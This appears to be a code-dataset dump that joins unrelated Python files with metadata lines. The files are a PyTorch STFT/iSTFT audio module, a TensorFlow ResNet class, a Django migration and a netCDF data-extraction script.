gcd = math.gcd(src_sr, dst_sr)
src_sr = src_sr // gcd
dst_sr = dst_sr // gcd
if src_sr == 1 or dst_sr == 1:
raise ValueError("do not support integer downsample/upsample")
zeros_per_block = min(src_sr, dst_sr) * cutoff_ratio
padding = 1 + int(num_zeros / zeros_per_block)
# dst_sr x src_sr x K
times = (np.arange(dst_sr)[:, None, None] / float(dst_sr) -
np.arange(src_sr)[None, :, None] / float(src_sr) -
np.arange(2 * padding + 1)[None, None, :] + padding)
window = np.heaviside(1 - np.abs(times / padding),
0.0) * (0.5 + 0.5 * np.cos(times / padding * math.pi))
weight = np.sinc(
times * zeros_per_block) * window * zeros_per_block / float(src_sr)
return th.tensor(weight, dtype=th.float32)
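# Usage sketch (assumed rates): filter for a 0.9x speed perturbation
#   w = speed_perturb_filter(16000, 14400)
#   # -> tensor of shape (dst_sr, src_sr, 2 * padding + 1) after gcd reduction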
def splice_feature(feats: th.Tensor,
lctx: int = 1,
rctx: int = 1,
subsampling_factor: int = 1,
op: str = "cat") -> th.Tensor:
"""
Splice feature
Args:
feats (Tensor): N x ... x T x F, original feature
lctx: left context
rctx: right context
subsampling_factor: subsampling factor
op: operator on feature context
Return:
splice (Tensor): feature with context padded
"""
if lctx + rctx == 0:
return feats
if op not in ["cat", "stack"]:
raise ValueError(f"Unknown op for feature splicing: {op}")
# [N x ... x T x F, ...]
ctx = []
T = feats.shape[-2]
T = T - T % subsampling_factor
for c in range(-lctx, rctx + 1):
idx = th.arange(c, c + T, device=feats.device, dtype=th.int64)
idx = th.clamp(idx, min=0, max=T - 1)
ctx.append(th.index_select(feats, -2, idx))
if op == "cat":
# N x ... x T x FD
splice = th.cat(ctx, -1)
else:
# N x ... x T x F x D
splice = th.stack(ctx, -1)
return splice
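# Usage sketch (assumed shapes): add one frame of left/right context
#   y = splice_feature(th.randn(4, 100, 80), lctx=1, rctx=1, op="cat")
#   # -> 4 x 100 x 240 (three frames concatenated on the feature axis)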
def _forward_stft(
wav: th.Tensor,
kernel: th.Tensor,
output: str = "polar",
pre_emphasis: float = 0,
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT inner function
Args:
wav (Tensor), N x (C) x S
kernel (Tensor), STFT transform kernels, from init_kernel(...)
output (str), output format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
pre_emphasis: factor of preemphasis
onesided: return half FFT bins
center: if true, we assumed to have centered frames
Return:
transform (Tensor or [Tensor, Tensor]), STFT transform results
"""
wav_dim = wav.dim()
if output not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {output}")
if wav_dim not in [2, 3]:
raise RuntimeError(f"STFT expect 2D/3D tensor, but got {wav_dim:d}D")
# if N x S, reshape N x 1 x S
# else: reshape NC x 1 x S
N, S = wav.shape[0], wav.shape[-1]
wav = wav.view(-1, 1, S)
# NC x 1 x S+2P
if center:
pad = kernel.shape[-1] // 2
# NOTE: match with librosa
wav = tf.pad(wav, (pad, pad), mode="reflect")
# STFT
if pre_emphasis > 0:
# NC x W x T
frames = tf.unfold(wav[:, None], (1, kernel.shape[-1]),
stride=frame_hop,
padding=0)
frames[:, 1:] = frames[:, 1:] - pre_emphasis * frames[:, :-1]
# 1 x 2B x W, NC x W x T, NC x 2B x T
packed = th.matmul(kernel[:, 0][None, ...], frames)
else:
packed = tf.conv1d(wav, kernel, stride=frame_hop, padding=0)
# NC x 2B x T => N x C x 2B x T
if wav_dim == 3:
packed = packed.view(N, -1, packed.shape[-2], packed.shape[-1])
# N x (C) x B x T
real, imag = th.chunk(packed, 2, dim=-2)
# N x (C) x B/2+1 x T
if onesided:
num_bins = kernel.shape[0] // 4 + 1
real = real[..., :num_bins, :]
imag = imag[..., :num_bins, :]
if output == "complex":
return (real, imag)
elif output == "real":
return th.stack([real, imag], dim=-1)
else:
mag = (real**2 + imag**2 + EPSILON)**0.5
pha = th.atan2(imag, real)
return (mag, pha)
def _inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
kernel: th.Tensor,
window: th.Tensor,
input: str = "polar",
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> th.Tensor:
"""
iSTFT inner function
Args:
transform (Tensor or [Tensor, Tensor]), STFT transform results
kernel (Tensor), STFT transform kernels, from init_kernel(...)
input (str), input format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
onesided: return half FFT bins
center: used in _forward_stft
Return:
wav (Tensor), N x S
"""
if input not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {input}")
if input == "real":
real, imag = transform[..., 0], transform[..., 1]
elif input == "polar":
real = transform[0] * th.cos(transform[1])
imag = transform[0] * th.sin(transform[1])
else:
real, imag = transform
# (N) x F x T
imag_dim = imag.dim()
if imag_dim not in [2, 3]:
raise RuntimeError(f"Expect 2D/3D tensor, but got {imag_dim}D")
# if F x T, reshape 1 x F x T
if imag_dim == 2:
real = th.unsqueeze(real, 0)
imag = th.unsqueeze(imag, 0)
if onesided:
# [self.num_bins - 2, ..., 1]
reverse = range(kernel.shape[0] // 4 - 1, 0, -1)
# extend matrix: N x B x T
real = th.cat([real, real[:, reverse]], 1)
imag = th.cat([imag, -imag[:, reverse]], 1)
# pack: N x 2B x T
packed = th.cat([real, imag], dim=1)
# N x 1 x T
s = tf.conv_transpose1d(packed, kernel, stride=frame_hop, padding=0)
# normalized audio samples
# refer: https://github.com/pytorch/audio/blob/2ebbbf511fb1e6c47b59fd32ad7e66023fa0dff1/torchaudio/functional.py#L171
# 1 x W x T
win = th.repeat_interleave(window[None, ..., None],
packed.shape[-1],
dim=-1)
# W x 1 x W
I = th.eye(window.shape[0], device=win.device)[:, None]
# 1 x 1 x T
norm = tf.conv_transpose1d(win**2, I, stride=frame_hop, padding=0)
if center:
pad = kernel.shape[-1] // 2
s = s[..., pad:-pad]
norm = norm[..., pad:-pad]
s = s / (norm + EPSILON)
# N x S
s = s.squeeze(1)
return s
def forward_stft(
wav: th.Tensor,
frame_len: int,
frame_hop: int,
output: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
pre_emphasis: float = 0,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT function implementation, equals to STFT layer
Args:
wav: source audio signal
frame_len: length of the frame
frame_hop: hop size between frames
output: output type (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
pre_emphasis: factor of preemphasis
normalized: use normalized DFT kernel
onesided: output onesided STFT
mode: "kaldi"|"librosa", slight difference on applying window function
"""
K, _ = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=False,
mode=mode)
return _forward_stft(wav,
K.to(wav.device),
output=output,
frame_hop=frame_hop,
pre_emphasis=pre_emphasis,
onesided=onesided,
center=center)
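# Usage sketch (assumed input): one-sided complex STFT of a 1 s, 16 kHz batch
#   real, imag = forward_stft(th.randn(2, 16000), 400, 160, output="complex")
#   # each part has shape N x F x T with F = 512 // 2 + 1 = 257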
def inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
frame_len: int,
frame_hop: int,
input: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
iSTFT function implementation, equals to iSTFT layer
Args:
transform: results of STFT
frame_len: length of the frame
frame_hop: hop size between frames
input: input format (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
onesided: output onesided STFT
mode: "kaldi"|"librosa", slight difference on applying window function
"""
if isinstance(transform, th.Tensor):
device = transform.device
else:
device = transform[0].device
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=True,
mode=mode)
return _inverse_stft(transform,
K.to(device),
w.to(device),
input=input,
frame_hop=frame_hop,
onesided=onesided,
center=center)
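# Usage sketch (parameter choices are assumptions): functional round trip for
# some waveform tensor wav
#   mag, pha = forward_stft(wav, 400, 160, output="polar", window="hann")
#   rec = inverse_stft((mag, pha), 400, 160, input="polar", window="hann")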
class STFTBase(nn.Module):
"""
Base layer for (i)STFT
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
pre_emphasis: factor of preemphasis
mode: "kaldi"|"librosa", slight difference on applying window function
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
"""
def __init__(self,
frame_len: int,
frame_hop: int,
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
pre_emphasis: float = 0,
onesided: bool = True,
inverse: bool = False,
center: bool = False,
mode="librosa") -> None:
super(STFTBase, self).__init__()
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=inverse,
mode=mode)
self.K = nn.Parameter(K, requires_grad=False)
self.w = nn.Parameter(w, requires_grad=False)
self.frame_len = frame_len
self.frame_hop = frame_hop
self.onesided = onesided
self.pre_emphasis = pre_emphasis
self.center = center
self.mode = mode
self.num_bins = self.K.shape[0] // 4 + 1
self.expr = (
f"window={window}, stride={frame_hop}, onesided={onesided}, " +
f"pre_emphasis={self.pre_emphasis}, normalized={normalized}, " +
f"center={self.center}, mode={self.mode}, " +
f"kernel_size={self.num_bins}x{self.K.shape[2]}")
def num_frames(self, wav_len: th.Tensor) -> th.Tensor:
"""
Compute number of the frames
"""
if th.sum(wav_len <= self.frame_len):
raise RuntimeError(
f"Audio samples less than frame_len ({self.frame_len})")
kernel_size = self.K.shape[-1]
if self.center:
wav_len += kernel_size
return (wav_len - kernel_size) // self.frame_hop + 1
def extra_repr(self) -> str:
return self.expr
class STFT(STFTBase):
"""
Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(STFT, self).__init__(*args, inverse=False, **kwargs)
def forward(
self,
wav: th.Tensor,
output: str = "polar"
) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
Accept (single or multiple channel) raw waveform and output magnitude and phase
Args
wav (Tensor) input signal, N x (C) x S
Return
transform (Tensor or [Tensor, Tensor]), N x (C) x F x T
"""
return _forward_stft(wav,
self.K,
output=output,
frame_hop=self.frame_hop,
pre_emphasis=self.pre_emphasis,
onesided=self.onesided,
center=self.center)
class iSTFT(STFTBase):
"""
Inverse Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(iSTFT, self).__init__(*args, inverse=True, **kwargs)
def forward(self,
transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
input: str = "polar") -> th.Tensor:
"""
Accept phase & magnitude and output raw waveform
Args
transform (Tensor or [Tensor, Tensor]), STFT output
Return
s (Tensor), N x S
"""
return _inverse_stft(transform,
self.K,
self.w,
input=input,
frame_hop=self.frame_hop,
onesided=self.onesided,
center=self.center)
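# Hedged usage sketch, added for illustration only (not part of the original
# API); the sample rate and frame settings below are assumptions.
def _example_stft_roundtrip():
    stft = STFT(400, 160, window="hann")
    istft = iSTFT(400, 160, window="hann")
    # N x S input, polar STFT, then back to N x S samples
    mag, pha = stft(th.randn(2, 16000), output="polar")
    return istft((mag, pha), input="polar")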
| [((79, 8, 79, 24), 'torch.fft', 'th.fft', ({(79, 15, 79, 20): 'I / S', (79, 22, 79, 23): '1'}, {}), '(I / S, 1)', True, 'import torch as th\n'), ((88, 8, 88, 46), 'torch.reshape', 'th.reshape', ({(88, 19, 88, 20): 'K', (88, 22, 88, 45): '(B * 2, 1, K.shape[-1])'}, {}), '(K, (B * 2, 1, K.shape[-1]))', True, 'import torch as th\n'), ((125, 10, 131, 54), 'librosa.filters.mel', 'filters.mel', (), '', True, 'import librosa.filters as filters\n'), ((133, 11, 133, 43), 'torch.tensor', 'th.tensor', (), '', True, 'import torch as th\n'), ((152, 10, 152, 34), 'math.gcd', 'math.gcd', ({(152, 19, 152, 25): 'src_sr', (152, 27, 152, 33): 'dst_sr'}, {}), '(src_sr, dst_sr)', False, 'import math\n'), ((167, 11, 167, 46), 'torch.tensor', 'th.tensor', (), '', True, 'import torch as th\n'), ((260, 17, 260, 44), 'torch.chunk', 'th.chunk', (), '', True, 'import torch as th\n'), ((326, 13, 326, 40), 'torch.cat', 'th.cat', (), '', True, 'import torch as th\n'), ((328, 8, 328, 72), 'torch.nn.functional.conv_transpose1d', 'tf.conv_transpose1d', (), '', True, 'import torch.nn.functional as tf\n'), ((332, 10, 334, 38), 'torch.repeat_interleave', 'th.repeat_interleave', (), '', True, 'import torch as th\n'), ((338, 11, 338, 70), 'torch.nn.functional.conv_transpose1d', 'tf.conv_transpose1d', (), '', True, 'import torch.nn.functional as tf\n'), ((71, 17, 71, 61), 'torch.nn.functional.pad', 'tf.pad', ({(71, 24, 71, 30): 'window', (71, 32, 71, 60): '(lpad, B - frame_len - lpad)'}, {}), '(window, (lpad, B - frame_len - lpad))', True, 'import torch.nn.functional as tf\n'), ((86, 8, 86, 29), 'torch.transpose', 'th.transpose', ({(86, 21, 86, 22): 'K', (86, 24, 86, 25): '(0)', (86, 27, 86, 28): '(2)'}, {}), '(K, 0, 2)', True, 'import torch as th\n'), ((195, 14, 195, 70), 'torch.arange', 'th.arange', (), '', True, 'import torch as th\n'), ((196, 14, 196, 45), 'torch.clamp', 'th.clamp', (), '', True, 'import torch as th\n'), ((200, 17, 200, 32), 'torch.cat', 'th.cat', ({(200, 24, 200, 27): 'ctx', (200, 29, 200, 31): '-1'}, {}), '(ctx, -1)', True, 'import torch as th\n'), ((203, 17, 203, 34), 'torch.stack', 'th.stack', ({(203, 26, 203, 29): 'ctx', (203, 31, 203, 33): '-1'}, {}), '(ctx, -1)', True, 'import torch as th\n'), ((244, 14, 244, 53), 'torch.nn.functional.pad', 'tf.pad', (), '', True, 'import torch.nn.functional as tf\n'), ((248, 17, 250, 37), 'torch.nn.functional.unfold', 'tf.unfold', (), '', True, 'import torch.nn.functional as tf\n'), ((253, 17, 253, 59), 'torch.matmul', 'th.matmul', ({(253, 27, 253, 50): 'kernel[:, (0)][None, ...]', (253, 52, 253, 58): 'frames'}, {}), '(kernel[:, (0)][None, ...], frames)', True, 'import torch as th\n'), ((255, 17, 255, 68), 'torch.nn.functional.conv1d', 'tf.conv1d', (), '', True, 'import torch.nn.functional as tf\n'), ((316, 15, 316, 36), 'torch.unsqueeze', 'th.unsqueeze', ({(316, 28, 316, 32): 'real', (316, 34, 316, 35): '0'}, {}), '(real, 0)', True, 'import torch as th\n'), ((317, 15, 317, 36), 'torch.unsqueeze', 'th.unsqueeze', ({(317, 28, 317, 32): 'imag', (317, 34, 317, 35): '0'}, {}), '(imag, 0)', True, 'import torch as th\n'), ((323, 15, 323, 50), 'torch.cat', 'th.cat', ({(323, 22, 323, 46): '[real, real[:, (reverse)]]', (323, 48, 323, 49): '1'}, {}), '([real, real[:, (reverse)]], 1)', True, 'import torch as th\n'), ((324, 15, 324, 51), 'torch.cat', 'th.cat', ({(324, 22, 324, 47): '[imag, -imag[:, (reverse)]]', (324, 49, 324, 50): '1'}, {}), '([imag, -imag[:, (reverse)]], 1)', True, 'import torch as th\n'), ((336, 8, 336, 50), 'torch.eye', 'th.eye', (), '', True, 'import 
torch as th\n'), ((473, 17, 473, 53), 'torch.nn.Parameter', 'nn.Parameter', (), '', True, 'import torch.nn as nn\n'), ((474, 17, 474, 53), 'torch.nn.Parameter', 'nn.Parameter', (), '', True, 'import torch.nn as nn\n'), ((492, 11, 492, 44), 'torch.sum', 'th.sum', ({(492, 18, 492, 43): '(wav_len <= self.frame_len)'}, {}), '(wav_len <= self.frame_len)', True, 'import torch as th\n'), ((25, 15, 25, 59), 'torch.hann_window', 'th.hann_window', (), '', True, 'import torch as th\n'), ((77, 18, 77, 27), 'torch.eye', 'th.eye', ({(77, 25, 77, 26): 'B'}, {}), '(B)', True, 'import torch as th\n'), ((77, 29, 77, 43), 'torch.zeros', 'th.zeros', ({(77, 38, 77, 39): 'B', (77, 41, 77, 42): 'B'}, {}), '(B, B)', True, 'import torch as th\n'), ((197, 19, 197, 50), 'torch.index_select', 'th.index_select', ({(197, 35, 197, 40): 'feats', (197, 42, 197, 44): '(-2)', (197, 46, 197, 49): 'idx'}, {}), '(feats, -2, idx)', True, 'import torch as th\n'), ((269, 15, 269, 45), 'torch.stack', 'th.stack', (), '', True, 'import torch as th\n'), ((272, 14, 272, 34), 'torch.atan2', 'th.atan2', ({(272, 23, 272, 27): 'imag', (272, 29, 272, 33): 'real'}, {}), '(imag, real)', True, 'import torch as th\n'), ((67, 21, 67, 41), 'math.log2', 'math.log2', ({(67, 31, 67, 40): 'frame_len'}, {}), '(frame_len)', False, 'import math\n'), ((162, 13, 162, 39), 'numpy.arange', 'np.arange', ({(162, 23, 162, 38): '(2 * padding + 1)'}, {}), '(2 * padding + 1)', True, 'import numpy as np\n'), ((163, 30, 163, 53), 'numpy.abs', 'np.abs', ({(163, 37, 163, 52): '(times / padding)'}, {}), '(times / padding)', True, 'import numpy as np\n'), ((164, 46, 164, 79), 'numpy.cos', 'np.cos', ({(164, 53, 164, 78): '(times / padding * math.pi)'}, {}), '(times / padding * math.pi)', True, 'import numpy as np\n'), ((165, 13, 166, 32), 'numpy.sinc', 'np.sinc', ({(166, 8, 166, 31): '(times * zeros_per_block)'}, {}), '(times * zeros_per_block)', True, 'import numpy as np\n'), ((304, 30, 304, 50), 'torch.cos', 'th.cos', ({(304, 37, 304, 49): 'transform[1]'}, {}), '(transform[1])', True, 'import torch as th\n'), ((305, 30, 305, 50), 'torch.sin', 'th.sin', ({(305, 37, 305, 49): 'transform[1]'}, {}), '(transform[1])', True, 'import torch as th\n'), ((114, 12, 114, 32), 'math.log2', 'math.log2', ({(114, 22, 114, 31): 'frame_len'}, {}), '(frame_len)', False, 'import math\n'), ((160, 13, 160, 30), 'numpy.arange', 'np.arange', ({(160, 23, 160, 29): 'dst_sr'}, {}), '(dst_sr)', True, 'import numpy as np\n'), ((161, 13, 161, 30), 'numpy.arange', 'np.arange', ({(161, 23, 161, 29): 'src_sr'}, {}), '(src_sr)', True, 'import numpy as np\n')] |
xihuaiwen/chinese_bert | applications/tensorflow/cnns/models/resnet.py | 631afbc76c40b0ac033be2186e717885246f446c | # Copyright 2019 Graphcore Ltd.
from models.resnet_base import ResNet
import tensorflow.compat.v1 as tf
import tensorflow.contrib as contrib
from tensorflow.python.ipu import normalization_ops
# This is all written for: NHWC
class TensorflowResNet(ResNet):
def __init__(self, *args, **kwargs):
self.dtype = tf.float16
super(TensorflowResNet, self).__init__(*args, **kwargs)
def _get_variable(self, name, shape, init):
return tf.get_variable(name, shape, initializer=init, dtype=self.dtype)
def residual(self, x, shortcut, out_filters, stride, type='B'):
in_shape = shortcut.get_shape()
pad = int(x.get_shape()[3] - in_shape[3])
if pad != 0 or type == 'C':
if type == 'A':
shortcut = tf.strided_slice(shortcut, [0, 0, 0, 0], in_shape,
strides=[1, stride, stride, 1])
shortcut = tf.pad(shortcut, paddings=[[0, 0], [0, 0], [0, 0], [0, pad]])
else:
shortcut = self.conv(shortcut, 1, stride, out_filters)
shortcut = self.norm(shortcut)
x = shortcut + x
x = self.relu(x)
return x
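    # The shortcut handling above mirrors the options from the ResNet paper:
    # type 'A' strides and zero-pads the channel dimension, while 'B'/'C' use
    # a 1x1 projection ('C' projects even when the shapes already match).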
def relu(self, x):
return tf.nn.relu(x)
def conv(self, x, ksize, stride, filters_out, bias=True):
filters_in = x.get_shape()[-1]
wshape = [ksize, ksize, filters_in, filters_out]
w_init = contrib.layers.xavier_initializer(dtype=self.dtype)
weights = self._get_variable('weights', shape=wshape, init=w_init)
x = tf.nn.conv2d(x, weights, [1, stride, stride, 1], padding='SAME')
if bias:
bshape = [filters_out]
b_init = tf.zeros_initializer()
biases = self._get_variable('biases', shape=bshape, init=b_init)
x = x + biases
return x
def norm(self, x, type='BATCH', groups=32, training=False):
if type == 'BATCH':
# Perhaps use tf.nn.fused_batch_norm instead.
x = tf.layers.batch_normalization(x, fused=True, center=True, scale=True,
training=training, trainable=training,
momentum=0.997, epsilon=1e-5)
elif type == 'GROUP':
x = normalization_ops.group_norm(x, groups=groups, center=True, scale=True,
training=training, trainable=training,
channels_axis=-1, reduction_axes=[-3, -2])
return x
def fc(self, x, num_units_out):
num_units_in = x.get_shape()[1]
w_init = contrib.layers.xavier_initializer(dtype=self.dtype)
b_init = tf.constant_initializer(0.0)
with self.namescope('fc'):
weights = self._get_variable('weights', shape=[num_units_in, num_units_out], init=w_init)
biases = self._get_variable('biases', shape=[num_units_out], init=b_init)
x = tf.nn.xw_plus_b(x, weights, biases)
return x
def reduce_mean(self, x, indices=(1, 2)):
x = tf.reduce_mean(x, reduction_indices=indices)
return x
def maxpool(self, x):
x = tf.nn.max_pool(
x,
ksize=[1, 3, 3, 1],
strides=[1, 2, 2, 1],
padding='SAME')
return x
def namescope(self, debug_string):
return tf.variable_scope(debug_string)
| [((17, 15, 17, 79), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((35, 15, 35, 28), 'tensorflow.compat.v1.nn.relu', 'tf.nn.relu', ({(35, 26, 35, 27): 'x'}, {}), '(x)', True, 'import tensorflow.compat.v1 as tf\n'), ((41, 17, 41, 68), 'tensorflow.contrib.layers.xavier_initializer', 'contrib.layers.xavier_initializer', (), '', True, 'import tensorflow.contrib as contrib\n'), ((43, 12, 43, 76), 'tensorflow.compat.v1.nn.conv2d', 'tf.nn.conv2d', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((65, 17, 65, 68), 'tensorflow.contrib.layers.xavier_initializer', 'contrib.layers.xavier_initializer', (), '', True, 'import tensorflow.contrib as contrib\n'), ((66, 17, 66, 45), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(66, 41, 66, 44): '0.0'}, {}), '(0.0)', True, 'import tensorflow.compat.v1 as tf\n'), ((76, 12, 76, 56), 'tensorflow.compat.v1.reduce_mean', 'tf.reduce_mean', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((80, 12, 84, 27), 'tensorflow.compat.v1.nn.max_pool', 'tf.nn.max_pool', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((88, 15, 88, 46), 'tensorflow.compat.v1.variable_scope', 'tf.variable_scope', ({(88, 33, 88, 45): 'debug_string'}, {}), '(debug_string)', True, 'import tensorflow.compat.v1 as tf\n'), ((46, 21, 46, 43), 'tensorflow.compat.v1.zeros_initializer', 'tf.zeros_initializer', ({}, {}), '()', True, 'import tensorflow.compat.v1 as tf\n'), ((54, 16, 56, 75), 'tensorflow.compat.v1.layers.batch_normalization', 'tf.layers.batch_normalization', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((72, 16, 72, 51), 'tensorflow.compat.v1.nn.xw_plus_b', 'tf.nn.xw_plus_b', ({(72, 32, 72, 33): 'x', (72, 35, 72, 42): 'weights', (72, 44, 72, 50): 'biases'}, {}), '(x, weights, biases)', True, 'import tensorflow.compat.v1 as tf\n'), ((24, 27, 25, 75), 'tensorflow.compat.v1.strided_slice', 'tf.strided_slice', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((26, 27, 26, 88), 'tensorflow.compat.v1.pad', 'tf.pad', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((58, 16, 60, 87), 'tensorflow.python.ipu.normalization_ops.group_norm', 'normalization_ops.group_norm', (), '', False, 'from tensorflow.python.ipu import normalization_ops\n')] |
mareknowak98/AuctionPortal | backend/app/migrations/0021_auto_20201205_1846.py | 0059fec07d51c6942b8af73cb8c4f9962c21fc97 | # Generated by Django 3.1.4 on 2020-12-05 18:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0020_auto_20201204_2324'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='profileBankAccountNr',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='profile',
name='profileTelephoneNumber',
field=models.CharField(blank=True, max_length=15, null=True),
),
]
| [((16, 18, 16, 72), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((21, 18, 21, 72), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n')] |
bedaro/ssm-analysis | rawcdf_extract.py | 09880dbfa5733d6301b84accc8f42a5ee320d698 | #!/usr/bin/env python3
import time
import os
import tempfile
import shutil
import logging
from enum import Enum
from argparse import ArgumentParser, Namespace, FileType
from netCDF4 import Dataset, MFDataset
import geopandas as gpd
import numpy as np
domain_nodes_shp = "gis/ssm domain nodes.shp"
masked_nodes_txt = "gis/masked nodes.txt"
logger = logging.getLogger(__name__)
def get_node_ids(shps, masked):
merged = None
for i,shp in enumerate(shps):
df = gpd.read_file(shp)
df.set_index('node_id', inplace=True)
logger.debug("Shapefile {0} has {1} nodes".format(shp, len(df)))
if merged is None:
merged = df.index
else:
merged = merged.union(df.index)
logger.debug("get_node_ids found {0} nodes in {1} shapefiles".format(
len(merged), len(shps)))
masked_nodes = np.loadtxt(masked)
merged = merged.difference(masked_nodes)
logger.debug("{0} nodes left after masking".format(len(merged)))
return merged.to_numpy()
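# Usage sketch (relative paths assumed to resolve from the script directory):
#   nodes = get_node_ids([domain_nodes_shp], masked_nodes_txt)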
DEFAULT_SIGLAYERS = [-0.01581139, -0.06053274, -0.12687974, -0.20864949,
-0.30326778, -0.40915567, -0.52520996, -0.65060186,
-0.78467834, -0.9269075 ]
def init_output(output_cdf, indata, nodes, **kwargs):
args = Namespace(**kwargs)
output = Dataset(output_cdf, "w")
timeDim = output.createDimension('time', len(indata.dimensions['time']))
nodeDim = output.createDimension('node', len(nodes))
nodeVar = output.createVariable('node', "i4", ('node',))
output['node'][:] = nodes
timeVar = output.createVariable('time', "f4", ('time',))
# Iterate over all output variables
# If an extraction attribute is "all":
# - add the 'siglay' dimension to the output if it's not already present
# - include the 'siglay' dimension on the output variable
# - add a 'zeta' output variable
for var, attr in args.input_vars:
if attr == InputAttr.ALL:
siglayers = indata['siglay'][:] if 'siglay' in indata.variables else DEFAULT_SIGLAYERS
output.createDimension('siglay', len(siglayers))
output.createVariable('siglay', 'f4', ('siglay',))
output['siglay'][:] = siglayers
if 'zeta' in indata.variables:
output.createVariable('zeta', 'f4', ('time','node'))
break
return output
def append_output(output_cdf):
return Dataset(output_cdf, 'a')
def init_output_vars(output, **kwargs):
args = Namespace(**kwargs)
for var, attr in args.input_vars:
out_name = args.outprefix + var
if attr == InputAttr.BOTTOM:
out_name += "_bottom"
# TODO handle photic case
dims = ('time','siglay','node') if attr == InputAttr.ALL else ('time','node')
output.createVariable(out_name, 'f4', dims)
# Gotten from https://stackoverflow.com/questions/312443/how-do-you-split-a-list-or-iterable-into-evenly-sized-chunks
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i+n]
class InputAttr(Enum):
ALL = 0
BOTTOM = 1
# TODO add "photic" for the photic zone
attr_strings = {
"all": InputAttr.ALL,
"bottom": InputAttr.BOTTOM
}
# Expands an input variable argument into a variable name and an attribute
# describing the vertical extraction method.
def colon_meta(string):
var, attr = string.split(':', 2)
return (var, attr_strings[attr])
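# A small illustrative sketch (this helper is not part of the original script and is never
# called): it shows how an "--invar" value such as "DOXG:bottom" is expanded by colon_meta()
# into a variable name plus an InputAttr extraction mode.
def _example_colon_meta():
    var, attr = colon_meta("DOXG:bottom")
    # var == "DOXG" and attr == InputAttr.BOTTOM
    return var, attr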
def main():
script_home = os.path.dirname(os.path.realpath(__file__))
parser = ArgumentParser(description="Extract data from SSM netcdf output files")
parser.add_argument("incdf", nargs="+", help="each input CDF file")
parser.add_argument("outcdf",
help="the output CDF file (created if it doesn't exist)")
parser.add_argument("outprefix",
help="a prefix for the extracted variables in the output CDF")
parser.add_argument("-d", dest="domain_node_shapefiles", action="append",
help="Specify a domain node shapefile")
parser.add_argument("-m", dest="masked_nodes_file", type=FileType('r'),
help="Specify a different masked nodes text file")
parser.add_argument("--invar", dest="input_vars", type=colon_meta,
action="append",
help="Extract the values of a different output variable")
parser.add_argument("-v", "--verbose", action="store_true", dest="verbose",
help="Print progress messages during the extraction")
parser.add_argument("-c", "--chunk-size", type=int, dest="chunk_size",
help="Process this many CDF files at once")
parser.add_argument("--cache", dest="cache", action="store_true",
help="Use a read/write cache in a temporary directory")
# Cannot include default values of lists here, see
# https://bugs.python.org/issue16399
parser.set_defaults(chunk_size=4, verbose=False,
masked_nodes_file=os.path.join(script_home, masked_nodes_txt))
args = parser.parse_args()
# This is the workaround
if not args.input_vars:
args.input_vars = [("DOXG",InputAttr.BOTTOM)]
if not args.domain_node_shapefiles:
args.domain_node_shapefiles = [os.path.join(script_home, domain_nodes_shp)]
logging.basicConfig(level=logging.INFO if args.verbose else logging.WARNING)
#logger.setLevel(logging.DEBUG)
if args.cache:
with tempfile.TemporaryDirectory() as tmpdir:
exist_cdfs = []
logger.info("Caching input files...")
for infile in args.incdf:
newpath = os.path.join(tmpdir, os.path.basename(infile))
shutil.copy(infile, newpath)
exist_cdfs.append(newpath)
output_cdf = os.path.join(tmpdir, os.path.basename(args.outcdf))
if os.path.exists(args.outcdf):
logger.info("Caching output file...")
shutil.copy(args.outcdf, output_cdf)
